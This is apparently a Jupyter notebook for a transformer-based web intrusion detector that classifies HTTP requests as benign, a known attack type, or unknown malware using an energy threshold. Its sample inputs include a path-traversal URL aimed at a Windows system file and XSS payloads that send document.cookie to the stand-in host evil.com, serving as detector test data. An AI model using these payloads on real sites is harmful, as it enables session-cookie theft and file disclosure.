Loading Libraries


In [None]:
import torch
import numpy as np
import pandas as pd
from tqdm import tqdm
from pprint import pprint
from transformers import AutoTokenizer, AutoModelForSequenceClassification

Load the Dataset (if one is available)


In [None]:
# For developers
# Read every column as text and replace missing cells with the literal
# two-character string "" in a single chained expression.
df = pd.read_csv("./path/to/dataset.csv", dtype=str).fillna('""')
# Preview the first 5 rows of the dataset
df.head()

Format Input


In [None]:
# For developers
# Build the single text field the models consume: one "[TAG] value" entry per
# request attribute. The template is left exactly as it was (leading newline,
# indentation and trailing spaces inside the f-string included), because any
# change to it changes the text the tokenizer sees.
df["value"] = df.apply(
    lambda row: f"""
    [METHOD] {row['method']} 
    [URL] {row['url']} 
    [COOKIE] {row['cookie']} 
    [BODY] {row['body']} 
    [HOST] {row['host']} 
    [USER_AGENT] {row['user_agent']} 
    [X_FORWARDED_FOR] {row['x_forwarded_for']} 
    [REFERER] {row['referer']} 
    [X_REQUESTED_WITH] {row['x_requested_with']} 
    [ACCEPT_LANG] {row['accept_language']} 
    [HTTP_VERSION] {row['http_version']}""",
    axis=1
)
# Positional access: shows the first row even if the index does not contain label 0
pprint(df["value"].iloc[0])
# After formatting, the "value" column of the dataframe holds text along these
# lines (kept as comments so the cell does not echo a stray string as output):
#
# [METHOD] PUT
# [URL] /contact?path=..%5c..%5c..%5csystem32%5cconfig%5csystem
# [COOKIE] ABC123; lang=en-IN
# [BODY] {"values": ["?path=..%5c..%5c..%5csystem32%5cconfig%5csystem",]}
# [HOST] linkedinbackup.co
# [USER_AGENT] Mozilla/5.0
# [X_FORWARDED_FOR] ""
# [REFERER] ""
# [X_REQUESTED_WITH] ""
# [ACCEPT_LANG] tr;q=0.9
# [HTTP_VERSION] HTTP/1.1

Sample Input Received Through the API


In [None]:
# For End-User
# An example request, already flattened into "[TAG] value" lines, as it would be
# received through the API.
# NOTE(review): the tags used here ([PROTOCOL], [ACCEPT], [ACCEPT_LANGUAGE], ...) are
# not the same set the dataset formatting cell emits ([ACCEPT_LANG],
# [X_REQUESTED_WITH], [HTTP_VERSION], ...) - confirm which layout the models expect.
sample_request = """
[METHOD] PUT 
[URL] /shell.php?search=<style>@keyframes 
[COOKIE] _rails_session=<script>WebSocket('ws://evil.com').send(document.cookie)</script>; _ga=<script>new Image().src='http://evil.com/?c='+document.cookie;</script> 
[BODY] data=?search=<style>@keyframes x{}</style><iframe style='animation-name:x' onanimationend='alert(1)'>&timestamp=1746479555 
[HOST] appletwitter.biz 
[PROTOCOL]  
[USER_AGENT] Mozilla/5.0 (Linux; Android 14; OnePlus 11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Mobile Safari/537.36 
[ACCEPT] text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 
[ACCEPT_ENCODING] gzip, deflate, br 
[ACCEPT_LANGUAGE] es;q=0.9 
[CONTENT_TYPE] multipart/form-data 
[CONTENT_LENGTH]  
[CONNECTION] close 
[X_FORWARDED_FOR]  
[REFERER] 
"""

Load Binary Model


In [None]:
# Use the GPU when one is visible, otherwise stay on the CPU
device = torch.device("cpu" if not torch.cuda.is_available() else "cuda")

binary_model_dir = "./path/to/absolution_v1.0"
binary_model_tokenizer = AutoTokenizer.from_pretrained(binary_model_dir)

# Weights are explicitly loaded from .safetensors, then placed on the chosen device
binary_model = AutoModelForSequenceClassification.from_pretrained(
    binary_model_dir, use_safetensors=True
).to(device)
binary_model.eval()

Load Multi Model


In [None]:
# Load the multi-class model, place it on the same device as the binary model
# (a single .to() is enough - it was previously applied twice) and switch it to
# inference mode.
multi_model_dir = "./path/to/absolution_v2.0"
multi_model = AutoModelForSequenceClassification.from_pretrained(multi_model_dir).to(device)
multi_model.eval()

Tokenise Input Function


In [None]:
# For Developers
def tokenize(inputs):
    """Tokenize the ``"value"`` field of ``inputs`` with the binary model's tokenizer.

    ``inputs`` must expose a ``"value"`` entry holding the formatted request text
    (as produced by the formatting cell). Sequences are padded and truncated to
    512 tokens and the encoding is returned as PyTorch tensors.
    """
    encoding_options = {
        "padding": "max_length",
        "truncation": True,
        "max_length": 512,
        "return_tensors": "pt",
    }
    request_text = inputs["value"]
    return binary_model_tokenizer(request_text, **encoding_options)

Map inputs to tokenise the dataset


In [None]:
# Tokenized splits keyed by split name. The calibration cell reads
# tokenized_datasets["val"], so this has to be a mapping rather than a list.
# Populate it once a labelled dataset is available, for example:
# tokenized_datasets = {
#     "val": dataset["val"].map(tokenize, batched=True),
#     "test": dataset["test"].map(tokenize, batched=True),
# }
tokenized_datasets = {}

Define Energies Based on a Labeled Dataset


In [None]:
def energy_score(logits, T=1):
    """Return the energy score ``-T * logsumexp(logits / T)`` for each row of ``logits``.

    The log-sum-exp is taken over dimension 1, so a two-dimensional input yields
    one score per row. ``T`` is the temperature applied to the logits.
    """
    tempered = logits / T
    log_partition = torch.logsumexp(tempered, dim=1)
    return log_partition * -T

# Compute energy scores of the labelled validation split
val_energies = []
val_labels = []

# This is for enterprise to keep at backend and maintain
# Update it consistently with new inputs for intrusion detection of unknown malware

# Membership testing works for a dict of splits as well as for an empty list
# placeholder, so a notebook run without a dataset skips calibration instead of
# failing on tokenized_datasets["val"].
if "val" in tokenized_datasets:
    val_split = tokenized_datasets["val"]
else:
    val_split = []
    print("No 'val' split in tokenized_datasets - skipping energy calibration.")

with torch.no_grad():
    for example in tqdm(val_split):
        # Wrap each example in a batch of size 1 before sending it to the model
        inputs = {
            "input_ids": torch.tensor([example["input_ids"]]).to(device),
            "attention_mask": torch.tensor([example["attention_mask"]]).to(device)
        }
        outputs = multi_model(**inputs)
        val_energies.append(energy_score(outputs.logits).item())
        val_labels.append(example["label"])

In [None]:
# 95th percentile of the validation energies: 95% of the validation samples score
# at or below this value, so an input scoring above it is treated as out-of-distribution.
if len(val_energies) > 0:
    threshold = float(np.percentile(val_energies, 95))
else:
    # A percentile of an empty sample is not meaningful; fall back to the balanced
    # default (-5) that detect_attack also uses, so later cells still get a number.
    threshold = -5.0
    print("No validation energies collected - using the default threshold.")
print(f"Optimal energy threshold: {threshold}")

Attack Detection Logic


In [None]:
# For Enterprise
def detect_attack(text, binary_model, multi_model, tokenizer, energy_threshold=-5, device="cuda"):
    """Classify one formatted request by combining the binary and multi-class models.

    Args:
        text: The formatted request string (a single request, not a batch).
        binary_model: Sequence classifier whose class 0 is benign and class 1 is malicious.
        multi_model: Sequence classifier whose ``config.id2label`` names the attack
            classes and includes a ``"benign"`` label.
        tokenizer: Tokenizer used to encode ``text`` for both models.
        energy_threshold: Energy scores above this value are treated as
            out-of-distribution (possible unknown attack).
        device: Device to run on. If a CUDA device is requested but CUDA is not
            available, the CPU is used instead.

    Returns:
        dict with keys ``final_label`` (str), ``confidence`` (float in [0, 1]),
        ``binary_score`` and ``multi_scores`` (NumPy arrays of class probabilities)
        and ``energy_score`` (float).
    """
    # "cuda" is the default; fall back to the CPU rather than failing inside .to()
    # on machines without a GPU.
    device = torch.device(device)
    if device.type == "cuda" and not torch.cuda.is_available():
        device = torch.device("cpu")

    # Move models to device
    binary_model = binary_model.to(device)
    multi_model = multi_model.to(device)

    # Tokenize input
    inputs = tokenizer(text, return_tensors="pt", truncation=True, max_length=512).to(device)

    # Get predictions from both models
    with torch.no_grad():
        binary_out = binary_model(**inputs)
        multi_out = multi_model(**inputs)

    # Process binary model output (row 0 is the only request in the batch)
    binary_probs = torch.softmax(binary_out.logits, dim=-1)
    binary_pred = torch.argmax(binary_probs[0]).item()  # 0=benign, 1=malicious

    # Process multi-class model output
    multi_probs = torch.softmax(multi_out.logits, dim=-1)
    multi_pred_idx = torch.argmax(multi_probs[0]).item()
    multi_pred_label = multi_model.config.id2label[multi_pred_idx]

    # Calculate energy score
    energy = energy_score(multi_out.logits).item()

    # Decision logic
    # Note : This can be updated at anytime in future

    # Case 1: Both models agree on malicious (1 & 1)
    if binary_pred == 1 and multi_pred_label != "benign":
        final_label = multi_pred_label if energy <= energy_threshold else "unknown_malware"
        confidence = multi_probs[0][multi_pred_idx].item()

    # Case 2: Binary says malicious, multi says benign (1 & 0)
    elif binary_pred == 1 and multi_pred_label == "benign":
        final_label = "unknown_malware" if energy > energy_threshold else "benign"
        confidence = binary_probs[0][1].item()  # Binary's malicious confidence

    # Case 3: Binary says benign, multi says malicious (0 & 1)
    elif binary_pred == 0 and multi_pred_label != "benign":
        final_label = multi_pred_label  # Trust multi-class prediction
        confidence = multi_probs[0][multi_pred_idx].item()

    # Case 4: Both say benign but check OOD (0 & 0)
    else:
        if energy > energy_threshold:
            final_label = "unknown_malware"
            # The raw energy is not a probability (it is typically negative), so squash
            # the margin above the threshold into (0.5, 1) to keep "confidence" on the
            # same scale as in the other branches.
            confidence = torch.sigmoid(
                torch.tensor(float(energy - energy_threshold))
            ).item()
        else:
            final_label = "benign"
            # The multi-class argmax is the benign class here, so use its index rather
            # than assuming benign sits at position 0.
            confidence = binary_probs[0][0].item() * multi_probs[0][multi_pred_idx].item()  # Combined confidence

    return {
        "final_label": final_label,
        "confidence": confidence,
        "binary_score": binary_probs.cpu().detach().numpy()[0],
        "multi_scores": multi_probs.cpu().detach().numpy()[0],
        "energy_score": energy
    }

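Threshold Guidance:

    A request can only be flagged as unknown_malware when its energy score is above energy_threshold, so a higher threshold flags fewer requests and a lower threshold flags more.

    Strict Security (Low FPR): energy_threshold = -3

    Balanced (Default): energy_threshold = -5

    High Sensitivity (Low FN): energy_threshold = -7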


In [None]:
# For enterprise
# Manually chosen operating point (see the threshold guidance above). Swap in the
# percentile-based `threshold` computed earlier to use a validation-derived value.
energy_threshold = -4

result = detect_attack(
    text=sample_request,
    binary_model=binary_model,
    multi_model=multi_model,
    tokenizer=binary_model_tokenizer,
    energy_threshold=energy_threshold,
    device=device,  # reuse the device selected at model-load time instead of the "cuda" default
)

# Formatted output with proper dictionary access
print(f"""
Final Classification: {result['final_label']}
Confidence: {result['confidence']:.2%}
Energy Score: {result['energy_score']:.2f}
Binary Probabilities: [Benign: {result['binary_score'][0]:.4f}, Malicious: {result['binary_score'][1]:.4f}]
Multi-Class Probabilities:""")

# Print multi-class probabilities with labels. Labels are looked up by class index so
# the pairing does not depend on the iteration order of the id2label dict.
for class_idx, prob in enumerate(result['multi_scores']):
    label = multi_model.config.id2label.get(class_idx, str(class_idx))
    print(f"  {label}: {prob:.4f}")

# Add OOD threshold reference
print(f"\nOOD Threshold: {energy_threshold} (Values above this indicate potential unknown attacks)")
